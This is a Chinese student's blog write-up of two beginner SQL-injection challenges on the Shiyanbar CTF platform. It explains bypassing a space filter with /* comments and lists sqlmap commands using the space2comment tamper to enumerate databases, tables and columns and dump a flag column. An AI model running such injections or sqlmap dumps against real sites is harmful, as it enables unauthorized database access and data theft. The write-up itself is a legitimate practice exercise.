暑期练习web18:简单的sql注入1,2(实验吧)手工注入及sqlmap

目前只会做1和2。。3的话网上查了wp不知道他们sqlmap没防任何过滤咱们跑出来的。。。等来年长了本事了,一定要自己手工做出来
注入1的话呢,在输入1’ or ‘1’=’1的时候就发现存在过滤,后来发现是空格被过滤了,所以我们用注释符/*来替换空格,注入1的话就这一个点,我就贴原来的笔记上来了
暑期练习web18:简单的sql注入1,2(实验吧)手工注入及sqlmap_第1张图片
暑期练习web18:简单的sql注入1,2(实验吧)手工注入及sqlmap_第2张图片
接下来我们我们看看注入2
这题手工注入的话,其实和上一题没多大区别,也算把空格替换成注释符就行,不过因为order by只有1的的时候才有效,所以这次union select 后面接一个就行了
暑期练习web18:简单的sql注入1,2(实验吧)手工注入及sqlmap_第3张图片
下面用sqlmap进行注入
sqlmap.py -u http://ctf5.shiyanbar.com/web/index_2.php?id=1 –tamper=space2comment –dbs
查库名
这里写图片描述

sqlmap.py -u http://ctf5.shiyanbar.com/web/index_2.php?id=1 –tamper=space2comment –tables -D web1
查表名
这里写图片描述
sqlmap.py -u http://ctf5.shiyanbar.com/web/index_2.php?id=1 –tamper=space2comment –columns -T flag -D web1
查列名
暑期练习web18:简单的sql注入1,2(实验吧)手工注入及sqlmap_第4张图片
sqlmap.py -u http://ctf5.shiyanbar.com/web/index_2.php?id=1 –tamper=space2comment –dump -C flag -T flag -D web1
查列表内容
这里写图片描述

你可能感兴趣的:(ctf,web)